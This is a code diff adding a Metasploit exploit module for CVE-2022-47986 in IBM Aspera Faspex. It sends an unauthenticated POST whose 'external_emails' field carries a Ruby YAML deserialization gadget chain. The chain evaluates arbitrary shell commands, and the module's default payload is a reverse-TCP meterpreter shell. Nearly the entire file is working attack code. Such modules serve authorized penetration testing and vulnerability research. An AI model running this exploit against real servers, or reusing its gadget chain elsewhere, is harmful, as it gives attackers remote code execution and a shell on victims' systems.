[exploit][RCE][CVE-2022-47986] IBM aspera faspex YAML deserialization

modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb

@@ -0,0 +1,135 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::Remote::CheckModule
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'IBM Aspera Faspex YAML deserialization vulnerability',
+        'Description' => %q{
+          This module exploits an unauthenticated YAML deserialization vulnerability
+          which exists in IBM Aspera Faspex version 4.4.2 Patch Level 1 and below (CVE-2022-47986).
+        },
+        'References' => [
+          ['CVE', '2022-47986'],
+          ['URL', 'https://www.ibm.com/support/pages/node/6952319'],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-47986'],
+          ['URL', 'https://github.com/ohnonoyesyes/CVE-2022-47986/blob/main/poc.py'],
+          ['URL', 'https://thehackernews.com/2023/03/icefire-linux-ransomware.html'],
+          ['URL', 'https://attackerkb.com/topics/jadqVo21Ub/cve-2022-47986/rapid7-analysis'],
+        ],
+        'Author' => [
+          'ohnonoyesyes',    # POC
+          'Maurice LAMBERT', # Metasploit auxiliary module
+        ],
+        'DisclosureDate' => '2023-02-02',
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp',
+                'RPORT' => 9000
+              }
+            }
+          ],
+        ],
+        'CmdStagerFlavor' => [ 'echo' ],
+        'Payload' => { 'BadChars' => '`' },
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+  end
+
+
+  def execute_command(command, _opts = {})
+    exploit = %Q(
+---
+- !ruby/object:Gem::Installer
+    i: x
+- !ruby/object:Gem::SpecFetcher
+    i: y
+- !ruby/object:Gem::Requirement
+  requirements:
+    !ruby/object:Gem::Package::TarReader
+    io: &1 !ruby/object:Net::BufferedIO
+      io: &1 !ruby/object:Gem::Package::TarReader::Entry
+         read: 0
+         header: "pew"
+      debug_output: &1 !ruby/object:Net::WriteAdapter
+         socket: &1 !ruby/object:PrettyPrint
+             output: !ruby/object:Net::WriteAdapter
+                 socket: &1 !ruby/module "Kernel"
+                 method_id: :eval
+             newline: "throw `#{command}`"
+             buffer: {}
+             group_stack:
+              - !ruby/object:PrettyPrint::Group
+                break: true
+         method_id: :breakable
+      ).gsub(/\n/, '\n').gsub(/"/, '\"')
+
+      uuid = SecureRandom.uuid
+      payload = %Q({
+  "package_file_list": [
+    "/"
+  ],
+  "external_emails": "#{exploit}",
+  "package_name": "assetnote_pack",
+  "package_note": "#{Rex::Text.rand_text(50, bad: '', chars: 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789' + ' ' * 15)}",
+  "original_sender_name": "#{Rex::Text.rand_name()}",
+  "package_uuid": "#{uuid}",
+  "metadata_human_readable": "Yes",
+  "forward": "pew",
+  "metadata_json": "{}",
+  "delivery_uuid": "#{uuid}",
+  "delivery_sender_name": "#{Rex::Text.rand_name()}",
+  "delivery_title": "#{Rex::Text.rand_text_alphanumeric(4)}",
+  "delivery_note": "#{Rex::Text.rand_text_alphanumeric(12)}",
+  "delete_after_download": true,
+  "delete_after_download_condition": "IDK"
+})
+
+    response = send_request_raw({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI'], '/aspera/faspex/package_relay/relay_package'),
+      'data' => payload
+    })
+    if response && response.body
+      return response.body
+    end
+
+    false
+  end
+
+  def exploit
+    print_status('Exploiting...')
+    execute_cmdstager
+  end
+end